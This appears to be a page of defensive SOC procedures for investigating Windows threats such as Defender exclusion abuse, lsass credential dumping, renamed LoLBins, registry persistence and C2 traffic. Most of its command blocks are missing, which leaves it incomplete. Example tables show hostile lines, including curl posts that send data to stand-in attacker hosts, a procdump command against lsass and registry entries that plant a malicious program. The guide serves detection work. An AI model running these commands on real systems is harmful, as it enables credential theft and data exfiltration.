search

part 1

some of SOPs

hashtag
🚨 Files Added to Windows Defender Exclusion List (Registry)

Attackers often abuse the Windows Defender Exclusion List to prevent antivirus scans on malicious files or directories, ensuring their malware remains undetected.

hashtag
🔍 Windows Defender Exclusion List in Registry

Windows Defender stores its exclusion paths in the Windows Registry. Attackers can manipulate these keys to exclude files, folders, or processes from antivirus scans.

hashtag
📂 Registry Paths for Exclusion Lists:

  • File Exclusions:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

  • Process Exclusions:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes

  • Extension Exclusions:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions

hashtag
📑 Values Explanation:

  • Paths: Full paths to files or folders excluded from scanning.

  • Processes: Specific processes (e.g., malware.exe) excluded from scanning.

  • Extensions: File extensions (e.g., .dll, .exe) excluded from scanning.

hashtag
🛡️ How Attackers Abuse Defender Exclusions

  1. Adding Malware Paths:

    • Attackers add specific malicious directories or files to exclusion paths.

  2. Excluding Entire Drives:

    • E.g., C:\ or D:\ to ensure broad malware coverage.

  3. Excluding Specific Processes:

    • Attackers can exclude malicious tools (mimikatz.exe) from scanning.

  4. Excluding Specific Extensions:

    • E.g., .dll or .exe files to bypass detection.

hashtag
🎯 Detection & Investigation

hashtag
📌 Manual Check (Registry Editor)

  1. Open Registry Editor (regedit.exe).

  2. Navigate to the following paths:

  3. Review:

    • Paths: Look for unusual directories or files.

    • Processes: Check for malicious process names.

    • Extensions: Look for overly broad exclusions (e.g., .exe, .dll).

hashtag
📌 PowerShell Check

Run the following PowerShell commands to list Defender exclusions:

List All Exclusions:

Export Exclusion Details to File:

Check for Suspicious Additions:

Look for paths like:

  • C:\Windows\System32\*

  • C:\Users\Public\*

  • Entire drives (C:\)

hashtag
📊 Microsoft Defender for Endpoint Query (KQL)

If you're using Microsoft Defender for Endpoint (MDE), run the following query to detect recent changes to exclusion lists:

hashtag
What to Look For:

  • Recently added or modified exclusions.

  • Entries with unusual paths or filenames.

  • Exclusions added by non-admin accounts.

hashtag
🛡️ Remediation Steps

hashtag
1️⃣ Remove Suspicious Exclusions (PowerShell):

hashtag
2️⃣ Reset Defender Preferences (if heavily compromised):

hashtag
3️⃣ Run a Full Antivirus Scan:

hashtag
4️⃣ Review Permissions:

  • Ensure that only Administrators can modify Windows Defender settings.

  • Check for unauthorized privileged accounts.

hashtag
🧠 Harden Defender Settings

To prevent future abuse:

  1. Enable Tamper Protection: Prevent unauthorized changes to Defender settings.

  2. Enable Attack Surface Reduction (ASR) Rules:

  3. Monitor Exclusion Changes with SIEM Alerts: Set alerts in your SIEM for changes to the Defender exclusion registry keys.

hashtag
🚨 Conclusion

  • What Happened: Files or paths were added to the Defender exclusion list, likely by an attacker to evade detection.

  • Priority: High – Credential theft, persistence, or lateral movement may be ongoing.

  • Next Steps:

    • Investigate the timeline of the registry changes.

    • Remove unauthorized exclusions.

    • Perform a full malware scan.

    • Harden Defender settings.

hashtag
🚨 Unusual lsass.exe Parent, Child, or Path Analysis

The Local Security Authority Subsystem Service (lsass.exe) is a critical Windows process responsible for authentication, credential caching, and enforcing security policies.

Any irregularities involving lsass.exe—like unusual parent/child processes or deviations from its normal path—are highly suspicious and often indicate malicious activity.

hashtag
📝 1. Attack Breakdown

hashtag
📌 Legitimate Behavior of lsass.exe:

  • Parent Process: Usually spawned by winlogon.exe during system boot.

  • Child Processes: Rarely spawns child processes.

  • Path:

  • Privileges: Runs with SYSTEM-level privileges.

hashtag
📌 Suspicious Indicators:

  1. Unusual Parent Processes:

    • cmd.exe, powershell.exe, explorer.exe, or any third-party binaries.

  2. Unusual Child Processes:

    • procdump.exe, mimikatz.exe, taskmgr.exe, or unknown executables.

  3. Unusual File Paths:

    • C:\Temp\lsass.exe

    • C:\Windows\Temp\lsass.exe

    • Any non-standard directory.

  4. Command-Line Arguments:

    • Suspicious dump commands (e.g., procdump.exe -ma lsass.exe).

    • References to unauthorized tools (mimikatz, taskmgr).

hashtag
📌 Attack Techniques:

  • Credential Dumping: Tools like Mimikatz, procdump.exe, or rundll32.exe are used to extract credentials from lsass.exe.

  • Process Injection: Malware injects itself into lsass.exe for stealthy operations.

  • Persistence Mechanisms: Attackers may replace or masquerade lsass.exe for long-term access.

hashtag
🛡️ 2. Detection Techniques

hashtag
📌 Event Logs:

  • Event ID 4688: New process creation.

  • Event ID 4656: Handle request to lsass.exe (e.g., for dumping credentials).

  • Event ID 4663: Object access attempt on lsass.exe.

hashtag
📌 Microsoft Defender for Endpoint (MDE) Query (KQL):

hashtag
📌 Manual Investigation with Sysinternals:

  • Use Process Explorer to view parent/child processes.

  • Verify the path of lsass.exe:

  • Check active handles to lsass.exe:

hashtag
📌 PowerShell Command to Identify Suspicious Access:

hashtag
🕵️‍♂️ 3. Investigation Techniques

hashtag
1️⃣ Identify Suspicious Parent Processes:

  • Investigate how lsass.exe was spawned.

  • Use Event Viewer (Event ID 4688) or Defender Query.

hashtag
2️⃣ Identify Child Processes of lsass.exe:

  • lsass.exe shouldn't have child processes.

  • Any child process (e.g., procdump.exe, mimikatz.exe) is suspicious.

hashtag
3️⃣ Verify File Path and Hashes:

  • Check the file path and hash of lsass.exe:

  • Compare with VirusTotal.

hashtag
4️⃣ Analyze Memory Dumps:

  • Dump lsass.exe securely for offline analysis:

  • Analyze with Volatility Framework.

hashtag
5️⃣ Check Active Network Connections:

  • Monitor outbound connections from lsass.exe:

hashtag
🔧 4. Remediation Steps

hashtag
📌 Immediate Actions:

  1. Isolate the System: Remove the affected machine from the network.

  2. Terminate Suspicious Child Processes:

  3. Stop Unauthorized Dumping Tools:

  4. Investigate Registry Keys: Check for persistence mechanisms:

hashtag
📌 Clean Up Malicious Files:

  • Remove unauthorized binaries interacting with lsass.exe.

hashtag
📌 Reset Credentials:

  • Force a password reset for privileged accounts.

hashtag
📌 Perform Full Security Scans:

hashtag
🛡️ 5. Prevention Steps

  1. Enable Credential Guard: Prevent unauthorized access to lsass.exe memory.

  2. Enable Tamper Protection in Defender:

  3. Implement LSASS Protection Policies:

    • Use Windows Defender Exploit Guard to block unauthorized processes.

    • Enable Process Mitigation Policies:

  4. Monitor Registry and Event Logs:

    • Enable auditing for sensitive registry keys and LSASS access.

  5. Implement Least Privilege Access:

    • Ensure only authorized users can access lsass.exe.

hashtag
🧠 Key Takeaways

  • Normal Path: C:\Windows\System32\lsass.exe

  • Normal Parent: winlogon.exe or services.exe

  • No Child Processes: lsass.exe should not spawn child processes.

  • Suspicious Signs: Unusual paths, processes interacting with lsass.exe, or outbound connections.

hashtag
🚨 Next Steps:

  • Investigate the timeline of lsass.exe interactions.

hashtag
🚨 Suspicious LoLBins Process Rename Analysis

hashtag
🔍 1. Attack Breakdown

Living off the Land Binaries (LoLBins) are legitimate Windows executables often abused by attackers to execute malicious commands while evading detection. Renaming these binaries can further reduce the chances of detection by security tools and analysts.

hashtag
📑 Commonly Abused LoLBins:

LoLBin

Legitimate Purpose

Malicious Use

rundll32.exe

Run DLL files

Execute malicious DLLs

mshta.exe

Execute HTML applications

Run malicious scripts

powershell.exe

Automation and scripting

Run obfuscated malicious scripts

certutil.exe

Manage certificates

Download payloads

regsvr32.exe

Register DLL files

Execute malicious payloads

bitsadmin.exe

Manage downloads/uploads

Download payloads

cmstp.exe

Configure network settings

Execute malicious scripts

hashtag
📌 Suspicious Indicators of Renaming:

  1. Binary Executed with an Unexpected Name:

    • powershell.exe renamed to notepad.exe.

    • regsvr32.exe renamed to svchost.exe.

  2. Unusual Execution Paths:

    • C:\Temp\svchost.exe

    • C:\Windows\Temp\powershell.exe

  3. Obfuscated Command Lines:

    • cmd.exe /c renamed_bin.exe -encodedcommand YABzAHUAcwBwAGkAYwBpAG8AdQBz...

  4. File Hash Mismatch:

    • Hash does not match the original file but the binary behaves similarly.

  5. Abnormal Parent/Child Relationships:

    • explorer.exe spawning renamed_powershell.exe.

hashtag
🛡️ 2. Detection Techniques

hashtag
📊 Event Logs:

  • Event ID 4688 (Process Creation) – Monitor renamed binaries.

  • Event ID 4689 (Process Termination) – Unexpected termination patterns.

  • Event ID 4663 (Object Access) – Monitor access to sensitive files.

hashtag
📌 PowerShell Command: Detect Renamed Processes

hashtag
📌 Verify Process Hashes:

  • Cross-check hashes with VirusTotal or known baselines.

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL):

hashtag
📊 Alternate Query for File Hash Mismatch:

hashtag
🕵️ 3. Investigation Techniques

hashtag
1️⃣ Check File Path and Name:

  • Is the binary running from a non-standard path?

  • Example: C:\Users\Public\renamed_powershell.exe

hashtag
2️⃣ Check Binary Hash:

  • Compare the file hash with a known baseline or VirusTotal.

hashtag
3️⃣ Check Parent and Child Relationships:

  • Use Sysinternals Process Explorer or Task Manager to see:

    • Who spawned the renamed binary?

    • What child processes were created?

hashtag
4️⃣ Analyze Command-Line Arguments:

  • Look for encoded commands or suspicious arguments:

hashtag
5️⃣ Network Connections:

  • Identify if the renamed binary is making outbound connections:

hashtag
🔧 4. Remediation Steps

hashtag
📌 Immediate Actions:

  1. Terminate Suspicious Processes:

  2. Quarantine Suspicious Files:

    • Move the file to a safe location for further analysis.

  3. Disable Malicious Accounts:

    • If linked to a compromised user account, disable it immediately.

  4. Perform a Full Security Scan:

  5. Check for Persistence Mechanisms:

    • Review autoruns using Sysinternals Autoruns:

hashtag
🛡️ 5. Prevention Steps

  1. Monitor and Alert on Renamed Binaries:

    • Create alerts in your SIEM or MDE for renamed LOLBins.

  2. Application Control Policies (WDAC):

    • Restrict the execution of binaries from non-standard paths.

  3. Implement Attack Surface Reduction (ASR) Rules:

  4. Enable File Block Policies:

    • Block common LOLBin abuse scenarios via Group Policy.

  5. Educate Users:

    • Train employees to detect phishing and social engineering attacks.

hashtag
🧠 6. Key Takeaways

  • Unusual Paths: Legitimate binaries (powershell.exe, regsvr32.exe) should only execute from trusted directories (C:\Windows\System32).

  • Unusual Parents/Children: Monitor parent-child relationships involving renamed binaries.

  • File Hashes: Always verify binary hashes against known-good baselines.

  • Encoded Commands: Monitor for Base64 or obfuscated PowerShell commands.

hashtag
🚨 Startup Registry Analysis: Persistence Mechanism

hashtag
🔍 1. Attack Breakdown

Attackers frequently use Startup Registry Keys to achieve persistence on a compromised system. By adding malicious executables, scripts, or commands to these keys, they ensure their malware runs every time the system boots or a user logs in.

hashtag
📑 2. Common Startup Registry Keys

hashtag
📌 Run Keys (For User-Specific and System-Wide Persistence)

Registry Key

Scope

Behavior

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Current User

Executes on user login.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

All Users

Executes on system startup for all users.

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

Current User

Executes once during next login.

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

All Users

Executes once during next system startup.

hashtag
📌 Service and Drivers Keys

Registry Key

Scope

Behavior

HKLM\SYSTEM\CurrentControlSet\Services

System-wide

Runs malicious services on boot.

HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs

System-wide

DLL hijacking.

hashtag
📌 Shell and Explorer Keys

Registry Key

Scope

Behavior

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Current User

Runs custom shell on login.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

All Users

Replaces default shell with malicious executable.

hashtag
📌 Image File Execution Options (IFEO)

Registry Key

Scope

Behavior

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

System-wide

Hijacks legitimate executables by pointing them to malicious ones.

hashtag
🛡️ 3. Detection Techniques

hashtag
📊 Manual Check (Registry Editor)

  1. Open Registry Editor (regedit.exe).

  2. Navigate through the keys listed above.

  3. Look for:

    • Unfamiliar Executables: C:\Temp\malware.exe

    • Encoded Commands: Base64 strings, PowerShell commands

    • Network References: URLs or IP addresses

hashtag
📌 PowerShell Commands for Detection

🕵️ List Startup Entries in Run/RunOnce Keys

🕵️ List Startup Entries in Winlogon Keys

🕵️ List Startup Services

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Suspicious Registry Persistence

🕵️ Detect IFEO Hijacking

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ Identify the Startup Program/Script

  • Check if the file exists at the specified path.

  • Verify hashes:

hashtag
2️⃣ Check File Metadata

  • Verify creation/modification timestamps.

hashtag
3️⃣ Monitor Process Execution

  • Look for the suspicious executable in Task Manager or Process Explorer.

hashtag
4️⃣ Check Network Connections

  • Monitor connections initiated by the suspicious executable.

hashtag
5️⃣ Check Event Logs

  • Event ID 4688 (Process Creation)

  • Event ID 4656 (Registry Access)

hashtag
🔧 5. Remediation Steps

hashtag
📌 Remove Malicious Registry Entries

  • Open Registry Editor (regedit.exe).

  • Navigate to the affected key.

  • Export the Registry Key for Backup (right-click → Export).

  • Delete Suspicious Entries.

PowerShell Example:

hashtag
📌 Terminate Malicious Processes

hashtag
📌 Quarantine Malicious Files

  • Move suspicious executables to a secure location for analysis.

hashtag
📌 Perform Full Antivirus Scan

hashtag
🛡️ 6. Prevention Steps

  1. Enable Windows Defender Tamper Protection

  1. Monitor Registry Changes via Group Policy

    • Enable Registry Auditing for sensitive keys.

  2. Restrict Permissions for Startup Keys

    • Ensure only Administrators can modify these registry entries.

  3. Implement Application Whitelisting

    • Use Windows Defender Application Control (WDAC) or AppLocker.

  4. Enable Attack Surface Reduction (ASR) Rules

  1. Educate Users

    • Train users to avoid downloading suspicious attachments or running unknown scripts.

hashtag
🧠 7. Key Takeaways

  • Persistence is Common: Startup Registry is a favorite for attackers to ensure malware execution.

  • Monitor Key Registry Paths: Pay close attention to Run, RunOnce, and Winlogon keys.

  • Enable Registry Auditing: Always monitor changes to these keys.

  • Use Hash Validation: Validate file integrity with hashes and VirusTotal.

hashtag
🚨 Base64 Encoding/Decoding Detected: Threat Analysis

hashtag
🔍 1. Attack Breakdown

Base64 encoding/decoding is commonly used in both legitimate and malicious activities. While legitimate processes may use Base64 for data transfer, attackers often use it to obfuscate payloads, commands, or scripts to evade detection by security tools.

hashtag
📑 Common Scenarios of Malicious Base64 Usage

Attack Type

Description

Example Command

PowerShell Obfuscation

Hide malicious scripts or commands in Base64 format

powershell.exe -enc SQBFAFgAUABMAE8AUgBFAFIA

Malware Payload Delivery

Deliver encoded malware scripts

`echo SGVsbG8gd29ybGQ=

Credential Theft

Encode stolen credentials for exfiltration

echo YWRtaW46cGFzc3dvcmQ=

Data Exfiltration

Exfiltrate encoded data to C2 server

curl -X POST -d "ZGF0YQ==" http://attacker.com

hashtag
📌 Indicators of Suspicious Base64 Activity

  1. Encoded Commands in PowerShell or CMD:

  2. Suspicious Process Parents:

    • cmd.exe, powershell.exe, cscript.exe, mshta.exe, wscript.exe

  3. Network Traffic with Encoded Data:

    • Encoded payloads sent via HTTP/S to external domains.

  4. Usage of Built-in Encoding Utilities:

    • certutil.exe -encode

    • base64.exe

  5. Suspicious File Writes:

    • Files created with .bat, .ps1, .vbs containing Base64-encoded content.

hashtag
🛡️ 2. Detection Techniques

hashtag
📊 Manual Detection (Command Line History)

Run the following command to search for encoded commands in history:

hashtag
📊 Manual Check in Event Viewer

  • Event ID 4688: Process creation.

  • Event ID 4104: Script Block Logging in PowerShell.

Filter for commands containing -enc or Base64.

hashtag
📌 PowerShell Query for Encoded Commands

🕵️ Check for Encoded PowerShell Commands:

🕵️ Check Command-Line History:

🕵️ Extract Base64 Strings in Files:

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Base64-Encoded Commands

🕵️ Check Network Traffic for Encoded Data

🕵️ Look for Suspicious Encoded Scripts

hashtag
🕵️ 3. Investigation Techniques

hashtag
1️⃣ Decode the Base64 Payload

Use PowerShell to decode suspicious Base64 strings:

hashtag
2️⃣ Analyze Script Content

Inspect decoded content for:

  • Malicious commands (Invoke-WebRequest, Invoke-Expression)

  • Obfuscated payloads

  • Indicators of Credential Theft (e.g., passwords, tokens)

hashtag
3️⃣ Check Parent-Child Process Relationships

  • Identify who launched the Base64-encoded command.

  • Investigate child processes for malicious behavior.

hashtag
4️⃣ Network Traffic Analysis

  • Check if the decoded data points to C2 servers.

  • Monitor outbound connections for suspicious IPs or URLs.

hashtag
5️⃣ Correlate with File Activity

  • Identify if the command wrote files to disk (C:\Windows\Temp, C:\Users\Public).

hashtag
🔧 4. Remediation Steps

hashtag
📌 Kill Suspicious Processes

hashtag
📌 Quarantine Malicious Scripts or Files

hashtag
📌 Disable Obfuscated Script Execution

Disable obfuscated PowerShell scripts:

hashtag
📌 Perform Full Antivirus Scan

hashtag
📌 Clear PowerShell History

hashtag
🛡️ 5. Prevention Steps

  1. Enable PowerShell Script Block Logging:

  2. Restrict PowerShell Access to Admins Only:

    • Use Group Policy to restrict script execution to administrators.

  3. Monitor Event Logs Regularly:

    • 4688: Process Creation

    • 4104: Script Block Logging

  4. Use Application Control Policies (WDAC/AppLocker):

    • Block unauthorized execution of scripts.

  5. Educate Users:

    • Train users to identify suspicious emails and scripts.

hashtag
🧠 6. Key Takeaways

  • Base64 + Obfuscated Commands: Highly indicative of malicious activity.

  • Processes to Monitor: powershell.exe, cmd.exe, cscript.exe

  • Common Patterns: -enc, base64 -d, Invoke-Expression

--

hashtag
🚨 Communication from the Temp Directory: Threat Analysis

hashtag
🔍 1. Attack Breakdown

The Temp Directory (C:\Windows\Temp, C:\Users\<Username>\AppData\Local\Temp) is frequently abused by attackers because:

  • It has write permissions for standard users.

  • It's often excluded from strict monitoring by security tools.

  • It’s a common location for temporary files, making it easy to hide malicious activity.

hashtag
📑 Common Attack Scenarios:

Attack Technique

Description

Example Activity

Malware Execution

Dropping malicious payloads into Temp and executing them

C:\Users\<User>\AppData\Local\Temp\evil.exe

C2 Communication

Establishing connections with Command & Control servers

curl -X POST http://malicious.com -d @tempfile.tmp

Data Exfiltration

Staging stolen data for exfiltration

copy sensitive_data.txt C:\Temp\stage.tmp

Persistence Mechanism

Using Temp directory for autoruns

Registry keys pointing to C:\Temp\malware.exe

Fileless Malware

Temporary scripts executed in memory

powershell.exe -ExecutionPolicy Bypass -File C:\Temp\script.ps1

hashtag
📑 2. Suspicious Indicators of Temp Directory Activity

  1. Executable Files in Temp:

    • .exe, .dll, .bat, .vbs, .ps1

  2. Unusual Network Communication from Temp Files:

    • Outbound connections initiated by tempfile.exe.

  3. Registry Persistence via Temp Files:

    • Startup keys referencing C:\Temp\malware.exe.

  4. Encoded/Obfuscated Scripts:

    • Base64-encoded scripts executed from Temp.

  5. Abnormal Process Trees:

    • Example: explorer.execmd.exetempfile.exe

hashtag
🛡️ 3. Detection Techniques

hashtag
📊 Manual Inspection

List Files in Temp Directory:

Check Running Processes from Temp:

Check Network Connections from Temp Files:

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Processes Executed from Temp:

🕵️ Detect Outbound Network Traffic from Temp:

🕵️ Detect Persistence via Registry Keys:

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ File Hash Analysis:

Generate file hashes and upload them to VirusTotal:

hashtag
2️⃣ Check File Metadata:

Inspect creation and modification dates:

hashtag
3️⃣ Analyze Process Relationships:

Identify parent/child relationships of processes from Temp:

hashtag
4️⃣ Network Traffic Inspection:

  • Check outbound connections made by suspicious Temp files using:

hashtag
5️⃣ Registry Inspection:

Check for references to Temp in startup entries:

hashtag
🔧 5. Remediation Steps

hashtag
📌 Isolate the Affected System:

  • Disconnect the machine from the network immediately.

hashtag
📌 Terminate Suspicious Processes:

hashtag
📌 Quarantine Suspicious Files:

hashtag
📌 Clear Temp Directory (With Caution):

hashtag
📌 Registry Cleanup:

Remove registry entries pointing to malicious files:

hashtag
📌 Perform Full Antivirus Scan:

hashtag
🛡️ 6. Prevention Steps

  1. Restrict Execution from Temp Directory:

    • Use AppLocker or WDAC policies to block executable files in Temp.

  2. Enable Attack Surface Reduction (ASR) Rules:

  1. Regularly Clear Temp Directories:

    • Automate cleanup using scheduled tasks.

  2. Enable Logging for Script Block and Process Execution:

    • Ensure PowerShell Script Block Logging is enabled.

  3. Monitor Suspicious Network Traffic:

    • Enable alerts for outbound connections from Temp-based processes.

hashtag
🧠 7. Key Takeaways

  • Temp Abuse is Common: Attackers favor Temp directories for dropping payloads and initiating communications.

  • Monitor Execution: Processes running from C:\Temp or C:\Users\<User>\AppData\Local\Temp are suspicious.

  • Network Traffic: Outbound connections from Temp files are strong indicators of malicious activity.

  • Regular Auditing: Regularly review Temp directories and enable process execution alerts.-----------

-------------

hashtag
🚨 Communication to Suspicious Hosting Services: Threat Analysis

hashtag
🔍 1. Attack Breakdown

Attackers often use suspicious hosting services for:

  • Command and Control (C2): Controlling infected machines remotely.

  • Data Exfiltration: Stealing sensitive data.

  • Payload Delivery: Downloading additional malicious tools or updates.

  • Phishing Infrastructure: Hosting fake login pages or credential harvesters.

These services are typically hosted on:

  • Dynamic DNS Domains (e.g., duckdns.org, no-ip.org)

  • Anonymous Cloud Services (e.g., pastebin.com, Google Drive links)

  • Recently Registered Domains

  • Free Hosting Providers

hashtag
📑 2. Common Indicators of Suspicious Communication

Indicator

Description

IP Reputation:

IPs listed in threat intelligence feeds.

Domain Age:

Recently registered domains.

Unusual Ports:

Non-standard ports (e.g., 8080, 4444).

SSL/TLS Certificate:

Self-signed certificates or mismatched domains.

Communication Patterns:

Beaconing intervals, irregular traffic spikes.

File Downloads:

Downloading suspicious .exe, .ps1, or .bat files.

hashtag
📌 3. Detection Techniques

📊 PowerShell Detection:

Check Active Network Connections:

Resolve Suspicious IP Addresses:

Identify Processes Using Suspicious Connections:

📊 Microsoft Defender for Endpoint (MDE) Query (KQL):

Detect Connections to Known Malicious Domains/IPs:

Identify Beaconing Patterns (Regular Communication Intervals):

Identify Unusual Ports:

SSL Certificate Anomalies:

hashtag
📊 Event Viewer Logs:

  1. Event ID 4688: Process Creation (Look for commands with curl, wget, or encoded PowerShell commands).

  2. Event ID 5156: Allowed Connection (Monitor outbound network connections).

  3. Event ID 4104: Script Block Logging (PowerShell Script Activity).

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ Identify Initiating Processes:

  • Identify which processes initiated outbound communication.

hashtag
2️⃣ Inspect Command Lines:

  • Check how the connection was initiated.

hashtag
3️⃣ Check DNS Requests:

  • Analyze DNS cache for suspicious domains.

hashtag
4️⃣ Analyze Traffic Patterns:

  • Look for regular intervals (beaconing) to specific IPs or domains.

hashtag
5️⃣ Check Process Persistence:

  • Ensure the initiating process isn't set to restart automatically.

hashtag
🔧 5. Remediation Steps

hashtag
📌 Immediate Actions:

  1. Isolate the System:

  1. Block Suspicious Domains and IPs in Firewall:

  1. Terminate Suspicious Processes:

  1. Remove Malicious Scheduled Tasks:

  1. Clear DNS Cache:

hashtag
📌 Perform Full Antivirus Scan:

hashtag
📌 Investigate Files Downloaded from the Remote Server:

  • Check temp folders and known drop locations.

hashtag
🛡️ 6. Prevention Steps

  1. Enable Network Protection in Windows Defender:

  1. Block Unnecessary Ports (e.g., 8080, 4444):

  • Configure Windows Firewall to block uncommon outbound ports.

  1. Use Web Filtering Policies:

  • Block access to known malicious domains and dynamic DNS providers.

  1. Enable Attack Surface Reduction (ASR) Rules:

  1. Audit and Monitor DNS Queries:

  • Implement DNS filtering with tools like OpenDNS or Pi-hole.

  1. Educate Users:

  • Warn about phishing emails and malicious links.

hashtag
🧠 7. Key Takeaways

  • Indicators to Watch: Unknown IPs, non-standard ports, beaconing patterns.

  • High-Risk Processes: powershell.exe, cmd.exe, curl.exe, wget.exe.

  • Regular Monitoring: Monitor DNS requests and firewall logs.

  • Quick Action: Isolate infected hosts and block outbound communication

hashtag
---------------

hashtag
🚨 Interacting with the Windows Registry: Threat Analysis

hashtag
🔍 1. Attack Breakdown

The Windows Registry is a hierarchical database used by the Windows operating system to store configuration settings, system options, and application data. Attackers often interact with the registry to:

  • Achieve Persistence: Add keys for startup execution.

  • Disable Security Features: Turn off Windows Defender or Firewall.

  • Store Malicious Payloads: Hide payloads in registry keys.

  • Exfiltrate Data: Encode and hide stolen data.

  • Modify System Behavior: Disable logging or restrict user privileges.

hashtag
🛡️ Common Malicious Actions in the Registry

Technique

Registry Path Example

Description

Persistence via Run Key

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Executes malicious payloads at user login.

Disable Windows Defender

HKLM\Software\Microsoft\Windows Defender\DisableAntiSpyware

Turns off Windows Defender.

Enable RDP Access

HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections

Enables Remote Desktop access.

Change Shell Settings

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Changes default shell for persistence.

Hidden Payload Storage

HKCU\Software\AppData\HiddenKey

Hides encoded malware payloads in the registry.

hashtag
📑 2. Common Commands for Registry Interaction

hashtag
📝 Using reg.exe Command-Line Tool

Action

Command Example

Description

Add a Key/Value

reg add "HKCU\Software\MyApp" /v Payload /t REG_SZ /d "malicious.exe"

Adds a registry key with malicious payload.

Delete a Key/Value

reg delete "HKCU\Software\MyApp" /v Payload /f

Deletes a specific registry key or value.

Query a Key

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

Lists all entries in the Run key.

Export Registry Key

reg export HKCU\Software\MyApp C:\backup.reg

Exports a key to a .reg file.

Import Registry Key

reg import C:\backup.reg

Imports registry keys from a file.

hashtag
📝 Using PowerShell for Registry Interaction

Action

Command Example

Description

Add a Key/Value

New-ItemProperty -Path "HKCU:\Software\MyApp" -Name "Payload" -Value "malicious.exe" -PropertyType String

Adds a malicious entry.

Remove a Key/Value

Remove-ItemProperty -Path "HKCU:\Software\MyApp" -Name "Payload"

Removes an entry.

List Key/Values

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

Lists values in a specific key.

Search for Specific Strings

`Get-ChildItem -Path "HKCU:" -Recurse

Select-String "malicious"`

hashtag
🛡️ 3. Detection Techniques

hashtag
📊 Manual Inspection

1️⃣ Check for Startup Persistence:

2️⃣ List Recently Modified Registry Keys:

3️⃣ Check for Disabled Security Settings:

4️⃣ Identify Suspicious Scheduled Tasks via Registry:

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Registry Modifications:

🕵️ Monitor Disabled Security Settings:

🕵️ Detect Registry-Based Persistence:

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ Check Registry Backups:

  • Restore suspicious keys from a registry backup (C:\Windows\System32\config\RegBack).

hashtag
2️⃣ Validate File Paths in Registry:

  • Ensure that files referenced in the registry exist and match their expected hash.

hashtag
3️⃣ Correlate Registry Activity with Process Logs:

  • Look for processes (cmd.exe, powershell.exe) making registry modifications.

hashtag
4️⃣ Audit Registry Changes via Event Logs:

  • Event ID 4657: Registry Value Modification.

hashtag
🔧 5. Remediation Steps

hashtag
📌 Identify and Remove Malicious Keys

hashtag
📌 Revert Registry Changes:

  • Restore registry from backups if heavily compromised.

hashtag
📌 Terminate Related Processes:

hashtag
📌 Perform Full Antivirus Scan:

hashtag
📌 Review Group Policy Settings:

  • Ensure unauthorized registry changes are restricted.

hashtag
🛡️ 6. Prevention Steps

  1. Enable Registry Auditing:

    • Use Group Policy → Computer Configuration → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Object Access → Audit Registry.

  2. Enable Tamper Protection:

  1. Limit Administrative Access:

    • Restrict access to sensitive registry keys.

  2. Implement Application Whitelisting (WDAC/AppLocker):

    • Block unauthorized binaries.

  3. Monitor Registry Activity:

    • Ensure real-time monitoring for critical keys.

  4. Regular Backups:

    • Maintain regular registry backups.

hashtag
🧠 7. Key Takeaways

  • Startup Keys: Run, RunOnce, Winlogon are common persistence targets.

  • Security Settings: Monitor Windows Defender and Firewall registry keys.

  • File Paths: Validate file paths referenced in registry keys.

  • Auditing: Enable logging for Event ID 4657.

hashtag
🚨 Startup Registry: Threat Analysis

hashtag
🔍 1. Attack Breakdown

The Windows Startup Registry contains entries that specify which programs should automatically start when a user logs in or the system boots up. While legitimate software often uses this mechanism, attackers abuse it to ensure their malware or scripts persist across reboots.

hashtag
📑 Common Startup Registry Keys

Key Path

Scope

Purpose

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

User

Starts programs for the current user at login.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

System

Starts programs for all users at system boot.

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

User

Runs the program only once at user login.

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

System

Runs the program only once at system startup.

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

System

Replaces the default shell with a malicious program.

HKLM\SYSTEM\CurrentControlSet\Services

System

Creates malicious services for startup.

HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components

System

Executes malicious code during user profile creation.

hashtag
📌 Suspicious Indicators in Startup Registry

  1. Non-Standard File Paths:

    • C:\Temp\malware.exe

    • C:\Users\Public\script.ps1

  2. Unusual Processes:

    • References to cmd.exe, powershell.exe, or encoded commands.

  3. Obfuscated Strings:

    • Base64-encoded scripts.

    • Escaped characters (^, `).

  4. Misspellings or Typos:

    • expllrer.exe instead of explorer.exe.

  5. New or Recently Modified Entries:

    • Check timestamps for recently added or modified entries.

hashtag
🛡️ 2. Detection Techniques

hashtag
📊 Manual Detection via PowerShell

🕵️ Check User-Specific Startup Entries:

🕵️ Check System-Wide Startup Entries:

🕵️ Check Winlogon Shell:

🕵️ Check Startup Services:

🕵️ Identify Recently Modified Entries:

hashtag
